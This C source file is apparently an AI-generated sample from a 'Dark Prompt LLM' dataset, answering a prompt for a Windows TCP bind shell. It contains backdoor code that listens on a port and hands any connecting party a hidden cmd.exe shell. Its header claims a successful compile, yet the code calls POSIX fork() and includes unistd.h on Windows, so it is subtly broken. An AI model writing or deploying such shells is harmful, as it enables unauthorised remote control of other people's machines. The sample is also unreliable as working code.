/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 04:30:07
 * Category: ReverseShell
 * Prompt: Generate a TCP bind shell in C for Windows
 * Compile Status: SUCCESS
 * Sample: 3
 * ============================================================
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

void main(int argc, char* argv[]) {
    WSADATA wsaData;
    SOCKET sock, client_socket;
    struct sockaddr_in server_addr, client_addr;
    int iResult;

    // Initialize Winsock
    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != NO_ERROR) {
        printf("WSAStartup failed with error: %d\n", iResult);
        return;
    }

    // Create a socket
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        printf("Socket creation failed with error: %ld\n", WSAGetLastError());
        WSACleanup();
        return;
    }

    // Configure the server address structure
    memset(&server_addr, '\0', sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(atoi(argv[1]));
    server_addr.sin_addr.s_addr = htonl(INADDR_ANY);

    // Bind the socket to an IP address and port
    iResult = bind(sock, (struct sockaddr*)&server_addr, sizeof(server_addr));
    if (iResult == SOCKET_ERROR) {
        printf("Bind failed with error: %d\n", WSAGetLastError());
        closesocket(sock);
        WSACleanup();
        return;
    }

    // Listen for incoming connections
    iResult = listen(sock, SOMAXCONN);
    if (iResult == SOCKET_ERROR) {
        printf("Listen failed with error: %d\n", WSAGetLastError());
        closesocket(sock);
        WSACleanup();
        return;
    }

    // Accept a connection
    int clientLength = sizeof(client_addr);
    client_socket = accept(sock, (struct sockaddr*)&client_addr, &clientLength);
    if (client_socket == INVALID_SOCKET) {
        printf("Accept failed with error: %d\n", WSAGetLastError());
        closesocket(sock);
        WSACleanup();
        return;
    }

    // Fork a new process to handle the connection
    int fork_result = fork();
    if (fork_result > 0) {
        closesocket(client_socket);
        closesocket(sock);
        WSACleanup();
        return;
    }
    else if (fork_result == -1) {
        printf("Fork failed with error: %d\n", GetLastError());
        closesocket(client_socket);
        closesocket(sock);
        WSACleanup();
        return;
    }

    STARTUPINFO startup_info = { 0 };
    PROCESS_INFORMATION process_info = { 0 };

    startup_info.cb = sizeof(startup_info);
    startup_info.dwFlags = STARTF_USESTDHANDLES;
    startup_info.hStdInput = (HANDLE)client_socket;
    startup_info.hStdOutput = (HANDLE)client_socket;
    startup_info.hStdError = (HANDLE)client_socket;

    char* const command_line[] = { "cmd.exe", NULL };
    if (!CreateProcess(NULL, command_line[0], NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &startup_info, &process_info)) {
        printf("CreateProcess failed with error: %d\n", GetLastError());
        closesocket(client_socket);
        closesocket(sock);
        WSACleanup();
        return;
    }

    CloseHandle(process_info.hThread);
    CloseHandle(process_info.hProcess);

    return;
}